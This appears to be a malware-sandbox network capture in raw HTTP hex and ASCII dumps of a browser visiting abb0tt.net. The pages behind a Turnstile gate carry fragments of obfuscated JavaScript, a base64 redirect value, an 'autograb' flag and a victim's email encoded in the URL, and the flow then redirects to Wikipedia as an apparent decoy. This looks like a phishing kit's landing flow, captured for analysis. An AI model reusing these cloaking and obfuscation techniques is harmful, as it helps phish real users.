                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                                                                                                                      Referer: https://abb0tt.net/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: PHPSESSID=aa7j8tvauvrfcetoopclfb3glv
                                                                                                                                                                                                                                      2025-01-07 17:52:46 UTC428INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Tue, 07 Jan 2025 17:52:46 GMT
                                                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                      Access-Control-Allow-Headers: Content-Type
                                                                                                                                                                                                                                      Content-Length: 4005
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      2025-01-07 17:52:46 UTC4005INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 65 63 75 72 65 20 59 6f 75 72 20 41 63 63 65 73 73 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2e 64 65 6c 69 76 65 72 65 64 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0d 0a 20 20
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Secure Your Access</title> <style> body.delivered { display: none;


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      29192.168.2.1649753165.140.202.2354436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:46 UTC4266OUTGET /?cf-turnstile-response=0.SymkIi_BfYcYfqwEnZaHx7t49zevgXZekeN0KcT2VmX6ef7eIy8OTXXiyt37po9e6GWxxFIHCFfRFJU4wCqeiWnmId1E3CuoUcipU_8BbaxMzTbH-Vghdf8i56U1yZBCSwfyLoIgBDKY4WRaS_lPn5IEm33_z1op4HkkEBuRRQg6szScviPNLd_4ce2XHziixgy6SjvURhb9vPO7RpeB3N_PUvNZLLU8VEUynBLWBbi06h3keXMMqTuRgRUPkjoxhkSJ33j4qApIkmAfdaDVi7WaSBO_hiQ8o-urDZG8ck3Gg-AmuKZ0L9ff0lRh8ZTMUlFktSQogQ40yyb1mHrU3AP7GQh92FgqlsF5DoJeZO_gpqkS9MAM5EcneVVauofDDyXR5-OPbb0tm81IvaD5Ov9BM9xutW4J2ERXa0eFnAj-Kvw8RyvyiBOvtVcgQPT8vecg0iODY6Xc5RW0G_1U_8ni5lehlk39fS7HHOleLm3CSCPXtlkGcjKoGx8nWzFeYPmQ_pWuM_Xy7eQ3AB1PocwW9c5bHEXSl-2BqN_d7nC5p_BOoBjSkqnPimV5mOEG7aNGDQyddkv5QbATCVYrsb_TYhJ6CN4FeJpnY4t9SJtUz4gyX-ZRnNXe6ZO3DcmmMxgQHzQUxnjFttmEfaidYBN1A8kwyd6XIe60VCVTdTXBBIffeEmZQi3C_wZ5k5qElt05XgfvEJ8ttK_zXAth6pcu5FTiqbh9xoYE1O5ne5dHWDrGQ2qj5yzM34jJlPxb.NlHyrkBXsakvpHDE1QlTxQ.e18051cf1aaab27119e39aa8bed1a5d3144ccf7c212403d2850c191c1605bdf5&cf-turnstile-response=0.SymkIi_BfYcYfqwEnZaHx7t49zevgXZekeN0KcT2VmX6ef7eIy8OTXXiyt37po9e6GWxxFIHCFfRFJU4wCqeiWnmId1E3CuoUcipU_8BbaxMzTbH- [TRUNCATED]
                                                                                                                                                                                                                                      Host: abb0tt.net
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Cache-Control: max-age=0
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                                                                                                                      Referer: https://abb0tt.net/?cf-turnstile-response=0.SymkIi_BfYcYfqwEnZaHx7t49zevgXZekeN0KcT2VmX6ef7eIy8OTXXiyt37po9e6GWxxFIHCFfRFJU4wCqeiWnmId1E3CuoUcipU_8BbaxMzTbH-Vghdf8i56U1yZBCSwfyLoIgBDKY4WRaS_lPn5IEm33_z1op4HkkEBuRRQg6szScviPNLd_4ce2XHziixgy6SjvURhb9vPO7RpeB3N_PUvNZLLU8VEUynBLWBbi06h3keXMMqTuRgRUPkjoxhkSJ33j4qApIkmAfdaDVi7WaSBO_hiQ8o-urDZG8ck3Gg-AmuKZ0L9ff0lRh8ZTMUlFktSQogQ40yyb1mHrU3AP7GQh92FgqlsF5DoJeZO_gpqkS9MAM5EcneVVauofDDyXR5-OPbb0tm81IvaD5Ov9BM9xutW4J2ERXa0eFnAj-Kvw8RyvyiBOvtVcgQPT8vecg0iODY6Xc5RW0G_1U_8ni5lehlk39fS7HHOleLm3CSCPXtlkGcjKoGx8nWzFeYPmQ_pWuM_Xy7eQ3AB1PocwW9c5bHEXSl-2BqN_d7nC5p_BOoBjSkqnPimV5mOEG7aNGDQyddkv5QbATCVYrsb_TYhJ6CN4FeJpnY4t9SJtUz4gyX-ZRnNXe6ZO3DcmmMxgQHzQUxnjFttmEfaidYBN1A8kwyd6XIe60VCVTdTXBBIffeEmZQi3C_wZ5k5qElt05XgfvEJ8ttK_zXAth6pcu5FTiqbh9xoYE1O5ne5dHWDrGQ2qj5yzM34jJlPxb.NlHyrkBXsakvpHDE1QlTxQ.e18051cf1aaab27119e39aa8bed1a5d3144ccf7c212403d2850c191c1605bdf5&cf-turnstile-response=0.SymkIi_BfYcYfqwEnZaHx7t49zevgXZekeN0KcT2VmX6ef7eIy8OTXXiyt37po9e6GWxxFIHCFfRFJU4wCqeiWnmId [TRUNCATED]
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: PHPSESSID=aa7j8tvauvrfcetoopclfb3glv
                                                                                                                                                                                                                                      2025-01-07 17:52:47 UTC434INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Tue, 07 Jan 2025 17:52:46 GMT
                                                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                      Access-Control-Allow-Headers: Content-Type
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      2025-01-07 17:52:47 UTC6INData Raw: 32 37 64 35 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 27d5
                                                                                                                                                                                                                                      2025-01-07 17:52:47 UTC4172INData Raw: 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 72 6f 63 65 73 73 69 6e 67 2e 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2e 64 65 6c 69 76 65 72 65 64 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0d 0a
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Processing..</title> <style> body.delivered { display: none;
                                                                                                                                                                                                                                      2025-01-07 17:52:47 UTC6025INData Raw: 22 3b 0d 0a 20 20 20 20 76 61 72 20 72 61 6e 64 6f 6d 20 3d 20 22 61 48 52 30 63 48 4d 36 4c 79 39 6f 63 6d 56 6d 4c 6d 78 70 4c 7a 39 6f 64 48 52 77 63 7a 6f 76 4c 32 56 75 4c 6e 64 70 61 32 6c 77 5a 57 52 70 59 53 35 76 63 6d 63 76 64 32 6c 72 61 53 39 4e 61 57 4e 79 62 33 4e 76 5a 6e 52 66 4d 7a 59 31 22 3b 0d 0a 20 20 20 20 76 61 72 20 61 75 74 6f 67 72 61 62 20 3d 20 66 61 6c 73 65 3b 0d 0a 20 20 20 20 63 6f 6e 73 74 20 5f 30 78 33 37 30 37 37 32 3d 5f 30 78 34 64 65 39 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 66 36 62 37 39 2c 5f 30 78 35 65 38 37 61 33 29 7b 63 6f 6e 73 74 20 5f 30 78 32 33 39 30 32 62 3d 5f 30 78 34 64 65 39 2c 5f 30 78 31 61 61 34 63 61 3d 5f 30 78 34 66 36 62 37 39 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63
                                                                                                                                                                                                                                      Data Ascii: "; var random = "aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9NaWNyb3NvZnRfMzY1"; var autograb = false; const _0x370772=_0x4de9;(function(_0x4f6b79,_0x5e87a3){const _0x23902b=_0x4de9,_0x1aa4ca=_0x4f6b79();while(!![]){try{c
                                                                                                                                                                                                                                      2025-01-07 17:52:47 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                      2025-01-07 17:52:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      30192.168.2.1649754165.140.202.2354436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:47 UTC2681OUTGET /oE8X9WywTktHJv7UszfC03GYzrl8oqZFRQJtR4IaS5hxhlRE6jLcAUFZNYekEs1X0dq1Tz3QFbpOuP5a8mL65fotnVc7WvrPHGqxxZNMDhiIHDuv7PiQgAKb4VSOcyogyLa92dTleCGsf0M2JUBwbM/index?a=c3VzYW4uYW5kcmV3c0BqZWZmcGFyaXNoLm5ldA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                      Host: abb0tt.net
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                                                                                                                      Referer: https://abb0tt.net/?cf-turnstile-response=0.SymkIi_BfYcYfqwEnZaHx7t49zevgXZekeN0KcT2VmX6ef7eIy8OTXXiyt37po9e6GWxxFIHCFfRFJU4wCqeiWnmId1E3CuoUcipU_8BbaxMzTbH-Vghdf8i56U1yZBCSwfyLoIgBDKY4WRaS_lPn5IEm33_z1op4HkkEBuRRQg6szScviPNLd_4ce2XHziixgy6SjvURhb9vPO7RpeB3N_PUvNZLLU8VEUynBLWBbi06h3keXMMqTuRgRUPkjoxhkSJ33j4qApIkmAfdaDVi7WaSBO_hiQ8o-urDZG8ck3Gg-AmuKZ0L9ff0lRh8ZTMUlFktSQogQ40yyb1mHrU3AP7GQh92FgqlsF5DoJeZO_gpqkS9MAM5EcneVVauofDDyXR5-OPbb0tm81IvaD5Ov9BM9xutW4J2ERXa0eFnAj-Kvw8RyvyiBOvtVcgQPT8vecg0iODY6Xc5RW0G_1U_8ni5lehlk39fS7HHOleLm3CSCPXtlkGcjKoGx8nWzFeYPmQ_pWuM_Xy7eQ3AB1PocwW9c5bHEXSl-2BqN_d7nC5p_BOoBjSkqnPimV5mOEG7aNGDQyddkv5QbATCVYrsb_TYhJ6CN4FeJpnY4t9SJtUz4gyX-ZRnNXe6ZO3DcmmMxgQHzQUxnjFttmEfaidYBN1A8kwyd6XIe60VCVTdTXBBIffeEmZQi3C_wZ5k5qElt05XgfvEJ8ttK_zXAth6pcu5FTiqbh9xoYE1O5ne5dHWDrGQ2qj5yzM34jJlPxb.NlHyrkBXsakvpHDE1QlTxQ.e18051cf1aaab27119e39aa8bed1a5d3144ccf7c212403d2850c191c1605bdf5&cf-turnstile-response=0.SymkIi_BfYcYfqwEnZaHx7t49zevgXZekeN0KcT2VmX6ef7eIy8OTXXiyt37po9e6GWxxFIHCFfRFJU4wCqeiWnmId [TRUNCATED]
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: PHPSESSID=aa7j8tvauvrfcetoopclfb3glv
                                                                                                                                                                                                                                      2025-01-07 17:52:49 UTC504INHTTP/1.1 302 Found
                                                                                                                                                                                                                                      Date: Tue, 07 Jan 2025 17:52:48 GMT
                                                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Location: https://href.li/?https://en.wikipedia.org/wiki/Windows_Server_2019#DummyBot
                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                      Access-Control-Allow-Headers: Content-Type
                                                                                                                                                                                                                                      Connection: keep-alive, close
                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      31192.168.2.1649756192.0.78.264436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:49 UTC716OUTGET /?https://en.wikipedia.org/wiki/Windows_Server_2019 HTTP/1.1
                                                                                                                                                                                                                                      Host: href.li
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Referer: https://abb0tt.net/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:49 UTC279INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Tue, 07 Jan 2025 17:52:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                      X-ac: 2.jfk _dca MISS
                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      2025-01-07 17:52:49 UTC550INData Raw: 32 31 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 68 72 65 66 2e 6c 69 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 52 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 20 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 65 6e 2e 77 69 6b 69 70 65 64 69 61 2e 6f 72 67 2f 77 69 6b 69 2f 57 69 6e 64 6f 77 73 5f 53 65 72 76 65 72 5f 32 30 31 39 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 77 69 6e 64 6f 77
                                                                                                                                                                                                                                      Data Ascii: 21a<!DOCTYPE html><html><head><title>href.li</title><meta http-equiv="Refresh" content="0; url=https://en.wikipedia.org/wiki/Windows_Server_2019" /><meta name="referrer" content="no-referrer" /><script type="text/javascript">/* <![CDATA[ */window


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      32192.168.2.1649758185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:50 UTC669OUTGET /wiki/Windows_Server_2019 HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:50 UTC1451INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 14:30:17 GMT
                                                                                                                                                                                                                                      vary: Accept-Encoding,Cookie,Authorization
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      content-language: en
                                                                                                                                                                                                                                      accept-ch:
                                                                                                                                                                                                                                      last-modified: Tue, 31 Dec 2024 19:32:28 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      age: 12152
                                                                                                                                                                                                                                      x-cache: cp3072 hit, cp3072 hit/1
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      set-cookie: WMF-Last-Access=07-Jan-2025;Path=/;HttpOnly;secure;Expires=Sat, 08 Feb 2025 12:00:00 GMT
                                                                                                                                                                                                                                      set-cookie: WMF-Last-Access-Global=07-Jan-2025;Path=/;Domain=.wikipedia.org;HttpOnly;secure;Expires=Sat, 08 Feb 2025 12:00:00 GMT
                                                                                                                                                                                                                                      set-cookie: WMF-DP=41b;Path=/;HttpOnly;secure;Expires=Wed, 08 Jan 2025 00:00:00 GMT
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      cache-control: private, s-maxage=0, max-age=0, must-revalidate, no-transform
                                                                                                                                                                                                                                      set-cookie: GeoIP=US:NY:New_York:40.71:-74.01:v4; Path=/; secure; Domain=.wikipedia.org
                                                                                                                                                                                                                                      set-cookie: NetworkProbeLimit=0.001;Path=/;Secure;SameSite=Lax;Max-Age=3600
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      content-length: 128581
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:50 UTC13320INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 63 6c 69 65 6e 74 2d 6e 6f 6a 73 20 76 65 63 74 6f 72 2d 66 65 61 74 75 72 65 2d 6c 61 6e 67 75 61 67 65 2d 69 6e 2d 68 65 61 64 65 72 2d 65 6e 61 62 6c 65 64 20 76 65 63 74 6f 72 2d 66 65 61 74 75 72 65 2d 6c 61 6e 67 75 61 67 65 2d 69 6e 2d 6d 61 69 6e 2d 70 61 67 65 2d 68 65 61 64 65 72 2d 64 69 73 61 62 6c 65 64 20 76 65 63 74 6f 72 2d 66 65 61 74 75 72 65 2d 73 74 69 63 6b 79 2d 68 65 61 64 65 72 2d 64 69 73 61 62 6c 65 64 20 76 65 63 74 6f 72 2d 66 65 61 74 75 72 65 2d 70 61 67 65 2d 74 6f 6f 6c 73 2d 70 69 6e 6e 65 64 2d 64 69 73 61 62 6c 65 64 20 76 65 63 74 6f 72 2d 66 65 61 74 75 72 65 2d 74 6f 63 2d 70 69 6e 6e 65 64 2d 63 6c 69 65 6e 74 70 72 65 66 2d 31 20
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html class="client-nojs vector-feature-language-in-header-enabled vector-feature-language-in-main-page-header-disabled vector-feature-sticky-header-disabled vector-feature-page-tools-pinned-disabled vector-feature-toc-pinned-clientpref-1
                                                                                                                                                                                                                                      2025-01-07 17:52:50 UTC16320INData Raw: 68 20 6d 77 2d 75 69 2d 69 63 6f 6e 2d 77 69 6b 69 6d 65 64 69 61 2d 73 65 61 72 63 68 22 3e 3c 2f 73 70 61 6e 3e 0a 0a 3c 73 70 61 6e 3e 53 65 61 72 63 68 3c 2f 73 70 61 6e 3e 0a 09 3c 2f 61 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 76 65 63 74 6f 72 2d 74 79 70 65 61 68 65 61 64 2d 73 65 61 72 63 68 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 64 78 2d 74 79 70 65 61 68 65 61 64 2d 73 65 61 72 63 68 20 63 64 78 2d 74 79 70 65 61 68 65 61 64 2d 73 65 61 72 63 68 2d 2d 73 68 6f 77 2d 74 68 75 6d 62 6e 61 69 6c 20 63 64 78 2d 74 79 70 65 61 68 65 61 64 2d 73 65 61 72 63 68 2d 2d 61 75 74 6f 2d 65 78 70 61 6e 64 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 77 2f 69 6e 64 65 78 2e
                                                                                                                                                                                                                                      Data Ascii: h mw-ui-icon-wikimedia-search"></span><span>Search</span></a><div class="vector-typeahead-search-container"><div class="cdx-typeahead-search cdx-typeahead-search--show-thumbnail cdx-typeahead-search--auto-expand-width"><form action="/w/index.
